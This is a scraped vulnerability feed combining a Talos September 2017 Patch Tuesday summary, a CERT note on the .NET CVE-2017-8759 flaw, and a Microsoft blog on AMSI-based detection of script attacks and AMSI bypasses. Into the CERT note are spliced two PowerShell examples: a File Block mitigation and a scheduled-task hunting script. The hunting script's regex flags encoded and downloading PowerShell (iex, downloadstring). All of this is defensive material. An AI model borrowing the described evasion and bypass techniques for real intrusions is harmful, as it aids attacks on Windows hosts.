This vulnerability manifests due to the service improperly validating input from an authenticated user within a guest operating system. Exploitation of this flaw is achievable if an attacker issues a \"specially crafted certificate\" within a guest operating system, causing the \"VM host agent service on the host operating system to execute arbitrary code.\" Microsoft notes that the Remote Desktop Virtual Host role is not enabled by default.<br /><br /><h3 id=\"h.ky3d7sjix04t\">CVE-2017-8739 - Scripting Engine Information Disclosure Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could disclose sensitive information to an attacker. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining information that could then be used to further exploit the system. Users who visit a specially crafted web page under the control of the attacker could be exploited.<br /><br /><h3 id=\"h.z9wdxzsfio38\">CVE-2017-8692 - Uniscribe Remote Code Execution Vulnerability</h3><br />An arbitrary code execution vulnerability has been identified in Windows Uniscribe that could allow an attacker to execute code in the context of the current user. This vulnerability manifests due to Uniscribe improperly handling objects in memory. Exploitation of this vulnerability could be achieved if a user navigates to a malicious web page or opens a malicious file designed to exploit this vulnerability.<br /><br /><h3 id=\"h.t7doth5n2cw\">CVE-2017-8675 - Win32k Elevation of Privilege Vulnerability</h3><br />A vulnerability in the Windows kernel-mode drivers has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability could result in an attacker being able to execute arbitrary code in kernel mode.
An attacker who executes a specially crafted executable could exploit this vulnerability and, as a result, gain full control of the affected system.<br /><br /><h3 id=\"h.ta4wavxlagpn\">CVE-2017-8720 - Win32k Elevation of Privilege Vulnerability</h3><br />A vulnerability in the Win32k component in Windows has been identified that could allow a privilege escalation attack to occur. This vulnerability manifests due to improper handling of objects in memory. Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system. An attacker who runs a specially crafted executable could leverage this vulnerability to perform actions as an administrator on the affected system.<br /><br /><h3 id=\"h.kkm2sbbbbjiq\">CVE-2017-8683 - Win32k Graphics Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows Graphics Component that could allow an attacker to gain information about the host. This vulnerability manifests due to the Graphics Component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br /><h3 id=\"h.fi4oouptx2sl\">CVE-2017-8678 - Win32k Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information about the host. This vulnerability manifests due to the kernel improperly handling objects in memory.
An attacker who runs a specially crafted executable could exploit this vulnerability and leverage the information to further compromise the host.<br /><br /><h3 id=\"h.jmbol5pwp86e\">Multiple CVEs - Win32k Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) component that could allow an attacker to gain information about the host. These vulnerabilities manifest due to the GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8677</li><li>CVE-2017-8680</li><li>CVE-2017-8681</li></ul><h3 id=\"h.ck0pehdfhuu3\">CVE-2017-8687 - Win32k Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the \"memory address of a kernel object,\" allowing the attacker to leverage the information to further compromise the host.<br /><br /><h3 id=\"h.4erxlgg1wp8\">CVE-2017-8702 - Windows Elevation of Privilege Vulnerability</h3><br />A vulnerability in Windows Error Reporting (WER) has been identified that could allow a privilege escalation attack to occur.
Successful exploitation of this vulnerability would result in an attacker obtaining administrator privileges on the targeted system.<br /><br /><h3 id=\"h.8xq934iw79wv\">Multiple CVEs - Windows GDI+ Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in the Windows Graphics Device Interface+ (GDI+) that could allow an attacker to obtain potentially sensitive information about the affected host. These vulnerabilities manifest due to the Windows GDI+ component improperly handling objects in memory. An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8684</li><li>CVE-2017-8685</li><li>CVE-2017-8688</li></ul><h3 id=\"h.j57wphkiyqt8\">CVE-2017-8710 - Windows Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability in the Windows System Information Console has been identified that could allow an attacker to read arbitrary files on an affected system. This vulnerability manifests due to improper parsing of XML input that contains a reference to an external entity (an XXE flaw): the entity's system identifier names a local file, and the parser substitutes that file's contents wherever the entity is referenced. An attacker who creates a specially crafted file containing such XML content and either opens the file or socially engineers a user into opening it on an affected system could exploit this vulnerability.<br /><br /><h3 id=\"h.7b1xywt7n53p\">Multiple CVEs - Windows Kernel Information Disclosure Vulnerability</h3><br />Multiple information disclosure vulnerabilities have been identified in the Windows kernel that could allow an attacker to gain information about the host. These vulnerabilities manifest due to the kernel improperly handling objects in memory.
An attacker who runs a specially crafted executable could exploit these vulnerabilities and leverage the information to further compromise the host.<br /><br />The following is a list of CVEs that reflect these vulnerabilities:<br /><ul><li>CVE-2017-8679</li><li>CVE-2017-8709</li><li>CVE-2017-8719</li></ul><h3 id=\"h.cbhbkylvrzxe\">CVE-2017-8708 - Windows Kernel Information Disclosure Vulnerability</h3><br />An information disclosure vulnerability has been identified in the Windows kernel that could allow an attacker to gain information which could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. This vulnerability manifests due to the kernel failing to properly initialize a memory address. An attacker who runs a specially crafted executable could exploit this vulnerability and obtain the \"base address of the kernel driver from a compromised process,\" allowing the attacker to leverage the information to further compromise the host.<br /><br /><h3 id=\"h.xp1vybmtwc6q\">CVE-2017-8716 - Windows Security Feature Bypass Vulnerability</h3><br />A vulnerability has been identified in Windows Control Flow Guard that could allow an attacker to bypass its intended function. This vulnerability manifests due to Control Flow Guard mishandling objects in memory. An attacker who runs a specially crafted executable on an affected host could exploit this vulnerability.<br /><br /><h3 id=\"h.5dcwsx39r8a8\">CVE-2017-8699 - Windows Shell Remote Code Execution Vulnerability</h3><br />An arbitrary code execution vulnerability has been identified in the Windows Shell that could allow an attacker to execute code in the context of the current user. This vulnerability manifests as a result of the Windows Shell improperly validating file copy destinations. A user who opens a specially crafted file could be exploited via this vulnerability.
Scenarios where an end user could be compromised include email-based attacks, where an attacker sends the victim a malicious attachment that the user opens, or web-based attacks where the user downloads and opens a malicious file.<br /><br /><h2 id=\"h.b311wwj7cqyf\">Vulnerabilities Rated Moderate</h2><br />The following vulnerabilities are rated \"moderate\" by Microsoft:<br /><ul><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8723\">CVE-2017-8723</a> - Microsoft Edge Security Feature Bypass Vulnerability</li><li><a href=\"https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8735\">CVE-2017-8735</a> - Microsoft Edge Spoofing Vulnerability</li></ul>The following briefly describes these vulnerabilities.<br /><br /><h3 id=\"h.6ja1j3o46v6h\">CVE-2017-8723 - Microsoft Edge Security Feature Bypass Vulnerability</h3><br />A vulnerability in Microsoft Edge has been identified that could allow an attacker to bypass the Content Security Policy (CSP) feature. This vulnerability manifests due to Edge improperly validating certain specially crafted documents. Successful exploitation could allow an attacker to redirect users to a malicious web page. Users who visit a specially crafted web page under the control of the attacker could be exploited. Alternatively, users who visit a compromised web page or who are served a malicious advertisement that an attacker has injected into an advertising network could be exploited.<br /><br /><h3 id=\"h.iughuzwb6gbk\">CVE-2017-8735 - Microsoft Edge Spoofing Vulnerability</h3><br />A vulnerability in Edge has been identified that could allow an attacker to spoof content on a targeted host. This vulnerability manifests due to improper parsing of HTTP content. Successful exploitation of this vulnerability would result in the user being redirected to a web site of the attacker's choosing.
This web site could then spoof content or serve as part of an exploit chain whereby the user could be exploited via another vulnerability. Scenarios where a user could be attacked include email or instant message vectors where the user clicks on a malicious link, or where the user navigates to a specially crafted web page under the control of the attacker.<br /><br /><h2 id=\"h.oka11wrn5dcu\">Coverage</h2><br />In response to these vulnerability disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href=\"https://snort.org/products\">Snort.org</a>.<br /><br /><b>Snort Rules:</b><br /><ul><li>42285-42286</li><li>42311-42312</li><li>42749-42750</li><li>44331-44336</li><li>44338-44343</li><li>44349-44350</li><li>44353-44357</li></ul>", "modified": "2017-09-12T22:44:10", "published": "2017-09-12T15:41:00", "id": "TALOSBLOG:36D857BF71D07CAE276BCB26AC34D574", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/Gck7dmdECXk/ms-tuesday.html", "title": "Microsoft Patch Tuesday - September 2017", "type": "talosblog", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cert": [{"lastseen": "2020-09-18T20:41:35", "bulletinFamily": "info", "cvelist": ["CVE-2017-8759"], "description": 
"### Overview \n\nThe Microsoft .NET framework fails to properly parse WSDL content, which can allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.\n\n### Description \n\nThe PrintClientProxy method in the WSDL-parsing component of the Microsoft .NET framework fails to properly handle linefeed characters. If an attacker can cause the .NET framework to parse a specially-crafted WSDL file, this can result in arbitrary code execution.\n\nThis vulnerability is currently being exploited in the wild, by way of an RTF file with an embedded SOAP Moniker object that triggers a remote WSDL file to be retrieved and parsed. Other attack vectors may be possible. \n \n--- \n \n### Impact \n\nBy causing the .NET framework to parse a specially-crafted WSDL file with the SOAP Moniker, an unauthenticated remote attacker may be able to execute arbitrary code on a vulnerable system. Current exploits achieve this by convincing a user to open an RTF document. \n \n--- \n \n### Solution \n\n**Apply an update** \n \nThis issue is addressed in [CVE-2017-8759 | .NET Framework Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>) \n \n--- \n \n**Enable Protected View for RTF documents in Microsoft Word** \n \nExploits in the wild utilize RTF documents. These public exploits are blocked if Word is configured, through File Block, either not to open RTF documents at all or to open them only in Protected View. Refer to [File Block Settings in the Microsoft Office Trust Center](<https://support.office.com/en-us/article/What-is-File-Block-10d0e0ab-fecf-4605-befd-1e6563e7686d>). 
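The registry workaround in this note has to be repeated for every Office version on the machine, and a typo in the path silently does nothing. The following PowerShell is an added example, not part of the CERT note, that applies the RTF File Block setting to each Office version found under HKCU for the current user and reads the stored values back so the change can be verified. It assumes the per-version layout `HKCU:\Software\Microsoft\Office\<ver>\Word\Security\FileBlock` and the value semantics described above (RtfFiles = 2 blocks open and save, OpenInProtectedView = 0 means blocked files are not opened); the version-number filter and the `-WhatIf` dry run are choices of this example.

```powershell
# Added example (not from the CERT note): apply the RTF File Block setting to
# every Office version installed for the current user, then read it back.
# Assumptions: per-version settings live under HKCU:\Software\Microsoft\Office\<ver>\Word,
# RtfFiles=2 blocks open and save, and OpenInProtectedView=0 means "do not open".

function Set-WordRtfFileBlock {
    [CmdletBinding(SupportsShouldProcess = $true)]
    param(
        # 2 = block open/save (the advisory's value); 0 = clear the block (roll back).
        [ValidateSet(0, 1, 2)]
        [int]$BlockValue = 2,

        # 0 = blocked files are not opened at all; 1 = open them in Protected View.
        [ValidateSet(0, 1, 2)]
        [int]$OpenInProtectedView = 0
    )

    $officeRoot = 'HKCU:\Software\Microsoft\Office'
    if (-not (Test-Path $officeRoot)) {
        Write-Warning "No per-user Office settings found under $officeRoot"
        return @()
    }

    $results = @()
    # Only version-number subkeys (14.0, 15.0, 16.0, ...) matter; skip Common, Outlook, etc.
    foreach ($ver in Get-ChildItem $officeRoot | Where-Object { $_.PSChildName -match '^\d+\.\d+$' }) {
        $wordKey = "$officeRoot\$($ver.PSChildName)\Word"
        if (-not (Test-Path $wordKey)) { continue }   # Word not present for this version

        $fileBlock = "$wordKey\Security\FileBlock"
        if ($PSCmdlet.ShouldProcess($fileBlock, "Set RtfFiles=$BlockValue, OpenInProtectedView=$OpenInProtectedView")) {
            New-Item -Path $fileBlock -Force | Out-Null
            New-ItemProperty -Path $fileBlock -Name 'RtfFiles' -PropertyType DWord -Value $BlockValue -Force | Out-Null
            New-ItemProperty -Path $fileBlock -Name 'OpenInProtectedView' -PropertyType DWord -Value $OpenInProtectedView -Force | Out-Null
        }

        # Read back what is actually stored so the caller can verify the change.
        $stored = Get-ItemProperty -Path $fileBlock -ErrorAction SilentlyContinue
        $results += [pscustomobject]@{
            OfficeVersion       = $ver.PSChildName
            RegistryPath        = $fileBlock
            RtfFiles            = $stored.RtfFiles
            OpenInProtectedView = $stored.OpenInProtectedView
        }
    }
    return $results
}

# Dry run first, then apply and show the stored values:
Set-WordRtfFileBlock -WhatIf
Set-WordRtfFileBlock | Format-Table -AutoSize
```

Two caveats when using this: a File Block policy pushed under `HKCU:\Software\Policies\Microsoft\Office` takes precedence over the per-user Trust Center value written here, so check that branch if the readback looks right but Word still opens RTF files; and the setting only mitigates the RTF delivery vector, not the underlying .NET parsing bug, so it is a stopgap until the update is applied.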
For example, the following registry values can be used to block the opening of RTF documents in Word 2016: \n \n`Windows Registry Editor Version 5.00` \n \n`[HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\FileBlock]` \n`\"RtfFiles\"=dword:00000002` \n \nFor other versions of Office, the path above will need to be modified to match the version number associated with the installed version of Office. \n \n--- \n \n### Vendor Information\n\n101048\n\n### Microsoft Corporation Affected\n\nUpdated: September 13, 2017 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.5 | E:H/RL:OF/RC:C \nEnvironmental | 6.5 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <https://www.fireeye.com/blog/threat-research/2017/09/zero-day-used-to-distribute-finspy.html>\n * <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8759>\n\n### Acknowledgements\n\nThis issue was discovered by Genwei Jiang and Dhanesh Kizhakkinan of FireEye, Inc.\n\nThis document was written by Will Dormann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2017-8759](<http://web.nvd.nist.gov/vuln/detail/CVE-2017-8759>) \n---|--- \n**Date Public:** | 2017-09-12 \n**Date First Published:** | 2017-09-13 \n**Date Last Updated:** | 2017-09-16 12:18 UTC \n**Document Revision:** | 26 \n", "modified": "2017-09-16T12:18:00", "published": 
"2017-09-13T00:00:00", "id": "VU:101048", "href": "https://www.kb.cert.org/vuls/id/101048", "type": "cert", "title": "Microsoft .NET framework SOAP Moniker PrintClientProxy remote code execution vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2018-01-16T22:10:44", "bulletinFamily": "blog", "cvelist": ["CVE-2017-8759"], "description": "[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/1-amsi-ml-banner-small.jpg>)\n\nScripts are becoming the weapon of choice of sophisticated activity groups responsible for targeted attacks as well as malware authors who indiscriminately deploy commodity threats.\n\nScripting engines such as JavaScript, VBScript, and PowerShell offer tremendous benefits to attackers. They run through legitimate processes and are perfect tools for living off the land: staying away from the disk and using common tools to [run code directly in memory](<https://blogs.technet.microsoft.com/mmpc/tag/in-memory-attacks/>). Often part of the operating system, scripting engines can evaluate and execute content from the internet on-the-fly. Furthermore, integration with popular apps makes them effective vehicles for delivering malicious implants through social engineering, as evidenced by the increasing use of [scripts in spam campaigns](<https://blogs.technet.microsoft.com/mmpc/2017/02/02/improved-scripts-in-lnk-files-now-deliver-kovter-in-addition-to-locky/>).\n\nMalicious scripts are not only used as delivery mechanisms. We see them in various stages of the kill chain, including during lateral movement and while establishing persistence. 
During these latter stages, the scripting engine of choice is clearly PowerShell, the _de facto_ scripting standard for administrative tasks on Windows, with the ability to invoke system APIs and access a variety of system classes and objects.\n\nWhile the availability of powerful scripting engines makes scripts convenient tools, the dynamic nature of scripts allows attackers to easily evade analysis and detection by antimalware and similar endpoint protection products. Scripts are easily obfuscated and can be loaded on-demand from a remote site or a key in the registry, posing detection challenges that are far from trivial.\n\nWindows 10 provides optics into script behavior through [Antimalware Scan Interface (AMSI)](<https://blogs.technet.microsoft.com/mmpc/2015/06/09/windows-10-to-offer-application-developers-new-malware-defenses/>), a generic, open interface that enables [Windows Defender Antivirus](<https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-antivirus/windows-defender-antivirus-in-windows-10?ocid=cx-blog-mmpc>) to look at script contents the same way script interpreters do, in a form that is both unencrypted and unobfuscated. In [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>), with knowledge from years analyzing script-based malware, we've added deep behavioral instrumentation to the Windows script interpreter itself, enabling it to capture system interactions originating from scripts. 
AMSI makes this detailed interaction information available to registered AMSI providers, such as Windows Defender Antivirus, enabling these providers to perform further inspection and vetting of runtime script execution content.\n\nThis unparalleled visibility into script behavior is capitalized further through other Windows 10 Fall Creators Update enhancements in both Windows Defender Antivirus and Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp?ocid=cx-blog-mmpc?ocid=cx-blog-mmpc>)). Both solutions make use of powerful machine learning algorithms that process the improved optics, with Windows Defender Antivirus delivering enhanced blocking of malicious scripts pre-breach and Windows Defender ATP providing effective behavior-based alerting for malicious post-breach script activity.\n\nIn this blog, we explore how Windows Defender ATP, in particular, makes use of AMSI inspection data to surface complex and evasive script-based attacks. We look at advanced attacks perpetrated by the highly skilled KRYPTON activity group and explore how commodity malware like Kovter abuses PowerShell to leave little to no trace of malicious activity on disk. From there, we look at how Windows Defender ATP [machine learning systems](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) make use of enhanced insight about script characteristics and behaviors to deliver vastly improved detection capabilities.\n\n## KRYPTON: Highlighting the resilience of script-based attacks\n\nTraditional approaches for detecting potential breaches are quite file-centric. Incident responders often triage autostart entries, sorting out suspicious files by prevalence or unusual name-folder combinations. 
With modern attacks moving closer towards being completely fileless, it is crucial to have additional sensors at relevant choke points.\n\nApart from not having files on disk, modern script-based attacks often store encrypted malicious content separately from the decryption key. In addition, the final key often undergoes multiple processes before it is used to decode the actual payload, making it impossible to make a determination based on a single file without tracking the actual invocation of the script. Even a perfect script emulator would fail this task.\n\nFor example, the activity group KRYPTON has been observed hijacking or creating scheduled tasks; they often target system tasks found in exclusion lists of popular forensic tools like [Autoruns for Windows](<https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns>). KRYPTON stores the unique decryption key within the parameters of the scheduled task, leaving the actual payload content encrypted.\n\nTo illustrate KRYPTON attacks, we look at a tainted Microsoft Word document identified by [John Lambert](<https://twitter.com/JohnLaTwC/status/915590893155098629>) and the [Office 365 Advanced Threat Protection](<https://products.office.com/en-au/exchange/online-email-threat-protection>) team.[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2-ams-ml-krypton-lure.png>)\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/2b-amsi-ml-krypton-lure.png>)\n\n_Figure 1. KRYPTON lure document_\n\nTo live off the land, KRYPTON doesn't drop or carry over any traditional malicious binaries that typically trigger antimalware alerts. Instead, the lure document contains macros and uses the Windows Scripting Host (_wscript.exe_) to execute a JavaScript payload. This script payload executes only with the right RC4 decryption key, which is, as expected, stored as an argument in a scheduled task. 
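The persistence pattern just described, a script host launched by a scheduled task whose command line carries the decryption key, is something a responder can hunt for without AMSI telemetry. The PowerShell below is an added example, not code from the Microsoft post, that enumerates registered tasks and flags exec actions which run a script host or PowerShell with a long key-like token on the command line, or which sit under the `\Microsoft\` task path that triage tools commonly exclude. The executable list, the token heuristics and the path rule are assumptions of this example, not indicators published for KRYPTON.

```powershell
# Added example (not from the Microsoft post): hunt scheduled tasks whose exec
# action launches a script host with a key-like argument, as described for
# KRYPTON. Executable list, token heuristics and path rule are assumptions.

function Find-SuspiciousScriptTask {
    param(
        # Pipe task objects in, or let the function pull every registered task.
        [Parameter(ValueFromPipeline = $true)]
        [object[]]$Task = (Get-ScheduledTask),

        # Minimum length for a command-line token to count as a possible embedded key.
        [int]$MinTokenLength = 16
    )
    process {
        foreach ($t in $Task) {
            foreach ($action in @($t.Actions)) {
                # Only exec actions carry a command line; skip COM handler/email actions.
                if (-not $action.Execute) { continue }
                $exe = [IO.Path]::GetFileName($action.Execute.Trim('"')).ToLowerInvariant()
                if ($exe -notin @('wscript.exe', 'cscript.exe', 'mshta.exe', 'powershell.exe', 'rundll32.exe')) { continue }

                $argLine = [string]$action.Arguments
                # Long runs of hex/base64 characters that mix digits and letters;
                # plain words (task names, switches) are excluded by the digit check.
                $tokens  = [regex]::Matches($argLine, "[A-Za-z0-9+/=]{$MinTokenLength,}") | ForEach-Object { $_.Value }
                $keyLike = @($tokens | Where-Object { $_ -match '\d' -and $_ -match '[A-Za-z]' })

                $reasons = @()
                if ($keyLike.Count -gt 0)              { $reasons += "key-like argument(s): $($keyLike -join ', ')" }
                if ($t.TaskPath -like '\Microsoft\*') { $reasons += 'registered under \Microsoft\, a path often excluded by triage tools' }
                if ($argLine -match '(?i)-enc|frombase64|iex|invoke-expression|downloadstring') { $reasons += 'encoded or downloading PowerShell' }
                if ($reasons.Count -eq 0) { continue }

                [pscustomobject]@{
                    TaskName  = $t.TaskName
                    TaskPath  = $t.TaskPath
                    Author    = $t.Author
                    Execute   = $action.Execute
                    Arguments = $argLine
                    Reasons   = $reasons -join '; '
                }
            }
        }
    }
}

# Run on the local host and review the hits, most useful sorted by path:
Find-SuspiciousScriptTask | Sort-Object TaskPath | Format-List
```

Expect some noise from legitimate vendor tasks that pass GUIDs or license tokens to `rundll32.exe`; the point is to surface script hosts under `\Microsoft\` with opaque arguments so they can be compared against a known-good baseline, which is exactly the class of task the post says Autoruns-style exclusion lists hide.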
Because it can only be triggered with the correct key introduced in the right order, the script payload is resilient against automated sandbox detonations and even manual inspection.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/3b-amsi-ml-krypton-chain.jpg>)\n\n_Figure 2. KRYPTON script execution chain through wscript.exe_\n\n## Exposing actual script behavior with AMSI\n\nAMSI overcomes KRYPTON's evasion mechanisms by capturing JavaScript API calls after they have been decrypted and are ready to be executed by the script interpreter. The screenshot below shows part of the exposed content from the KRYPTON attack as captured by AMSI.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/4-amsi-ml-krypton-script-captured.png>)\n\n_Figure 3. Part of the KRYPTON script payload captured by AMSI and sent to the cloud for analysis_\n\nBy checking the captured script behavior against indicators of attack (IoAs) built up by human experts as well as machine learning algorithms, Windows Defender ATP effortlessly flags the KRYPTON scripts as malicious. At the same time, Windows Defender ATP provides meaningful contextual information, including how the script is triggered by a malicious Word document.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/5-amsi-ml-krypton-script-alert.png>)\n\n_Figure 4. Windows Defender ATP machine learning detection of KRYPTON script captured by AMSI_\n\n## PowerShell use by Kovter and other commodity malware\n\nAdvanced activity groups like KRYPTON are not the only ones shifting from binary executables to evasive scripts. In the commodity space, [Kovter malware](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan:Win32/Kovter>) uses several processes to eventually execute its malicious payload. 
This payload resides in a PowerShell script decoded by a JavaScript file (executed by _wscript.exe_) and passed to _powershell.exe_ as an environment variable.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/6-amsi-ml-kovter-alert.png>)\n\n_Figure 5. Windows Defender ATP machine learning alert for the execution of the Kovter script-based payload_\n\nBy looking at the [PowerShell payload content captured by AMSI](<https://blogs.technet.microsoft.com/poshchap/2015/10/16/security-focus-defending-powershell-with-the-anti-malware-scan-interface-amsi/>), experienced analysts can easily spot similarities to [PowerSploit](<https://github.com/PowerShellMafia/PowerSploit>), a publicly available set of penetration testing modules. While such attack techniques involve file-based components, they remain extremely hard to detect using traditional methods because malicious activities occur only in memory. Such behavior, however, is effortlessly detected by Windows Defender ATP using machine learning that combines detailed AMSI signals with signals generated by PowerShell activity in general.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/7-amsi-ml-kovter-script-captured.png>)\n\n_Figure 6. Part of the Kovter script payload captured by AMSI and sent to the cloud for analysis_\n\n## Fresh machine learning insight with AMSI\n\nWhile AMSI provides rich information from captured script content, the highly variant nature of malicious scripts continues to make them challenging targets for detection. To efficiently extract and identify new traits differentiating malicious scripts from benign ones, Windows Defender ATP employs advanced machine learning methods.\n\nAs outlined in [our previous blog](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>), we employ a supervised machine learning classifier to identify breach activity. 
We build training sets based on malicious behaviors observed in the wild and normal activities on typical machines, augmenting that with data from controlled detonations of malicious artifacts. The diagram below conceptually shows how we capture malicious behaviors in the form of process trees.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/8-amsi-ml-process-tree.png>)\n\n_Figure 7. Process tree augmented by instrumentation for AMSI data_\n\nAs shown in the process tree, the kill chain begins with a malicious document that causes Microsoft Word (_winword.exe_) to launch PowerShell (_powershell.exe_). In turn, PowerShell executes a heavily obfuscated script that drops and executes the malware _fhjUQ72.tmp_, which then obtains persistence by adding a run key to the registry. From the process tree, our machine learning systems can extract a variety of features to build _expert classifiers_ for areas like registry modification and file creation, which are then converted into numeric scores that are used to decide whether to raise alerts.\n\nWith the instrumentation of AMSI signals added as part of the [Windows 10 Fall Creators Update](<https://blogs.windows.com/windowsexperience/2017/10/17/whats-new-windows-10-fall-creators-update/>) (version 1709), Windows Defender ATP machine learning algorithms can now make use of insight into the unobfuscated script content while continually referencing machine state changes associated with process activity. We've also built a variety of script-based models that inspect the nature of executed scripts, such as the count of obfuscation layers, entropy, obfuscation features, [_ngrams_](<https://azure.microsoft.com/en-au/services/cognitive-services/text-analytics/>), and specific API invocations, to name a few.\n\nAs AMSI peels off the obfuscation layers, Windows Defender ATP benefits from growing visibility and insight into API calls, variable names, and patterns in the general structure of malicious scripts. 
And while AMSI data helps improve human expert knowledge and their ability to train learning systems, our _deep neural networks_ automatically learn features that are often hidden from human analysts.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/9-amsi-ml-javascript-powershell-alert.png>)\n\n_Figure 8. Machine learning detections of JavaScript and PowerShell scripts_\n\nWhile these new script-based machine learning models augment our expert classifiers, we also correlate new results with other behavioral information. For example, Windows Defender ATP correlates the detection of suspicious script contents from AMSI with other proximate behaviors, such as network connections. This contextual information is provided to SecOps personnel, helping them respond to incidents efficiently.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/10-amsi-ml-vbscript-network-alert.png>)\n\n_Figure 9. Machine learning combines VBScript content from AMSI and tracked network activity_\n\n## Detection of AMSI bypass attempts\n\nWith AMSI providing powerful insight into malicious script activity, attacks are more likely to incorporate AMSI bypass mechanisms that we group into three categories:\n\n * Bypasses that are part of the script content and can be inspected and alerted on\n * Tampering with the AMSI sensor infrastructure, which might involve the replacement of system files or manipulation of the load order of relevant DLLs\n * Patching of AMSI instrumentation in memory\n\nThe Windows Defender ATP research team proactively develops anti-tampering mechanisms for all our sensors. 
We have devised heuristic alerts for possible manipulation of our optics, designing these alerts so that they are triggered in the cloud before the bypass can suppress them.\n\nDuring actual [attacks involving CVE-2017-8759](<https://blogs.technet.microsoft.com/mmpc/2017/09/12/exploit-for-cve-2017-8759-detected-and-neutralized/>), Windows Defender ATP not only detected malicious post-exploitation scripting activity but also detected attempts to bypass AMSI using code similar to one identified by [Matt Graeber](<https://twitter.com/mattifestation/status/735261176745988096?lang=en>).\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/11-amsi-ml-bypass-alert.png>)\n\n_Figure 10. Windows Defender ATP alert based on AMSI bypass pattern_\n\nAMSI itself captured the following bypass code for analysis in the Windows Defender ATP cloud.\n\n[](<https://cloudblogs.microsoft.com/uploads/prod/2018/01/12b-amsi-ml-bypass-code-captured.png>)\n\n_Figure 11. AMSI bypass code sent to the cloud for analysis_\n\n## Conclusion: Windows Defender ATP machine learning and AMSI provide revolutionary defense against highly evasive script-based attacks\n\nProvided as an open interface on Windows 10, Antimalware Scan Interface delivers powerful optics into malicious activity hidden in encrypted and obfuscated scripts that are oftentimes never written to disk. Such evasive use of scripts is becoming commonplace and is being employed by both highly skilled activity groups and authors of commodity malware.\n\nAMSI captures malicious script behavior by looking at script content as it is interpreted, without having to check physical files or being hindered by obfuscation, encryption, or polymorphism. At the endpoint, AMSI benefits local scanners, providing the necessary optics so that even obfuscated and encrypted scripts can be inspected for malicious content. 
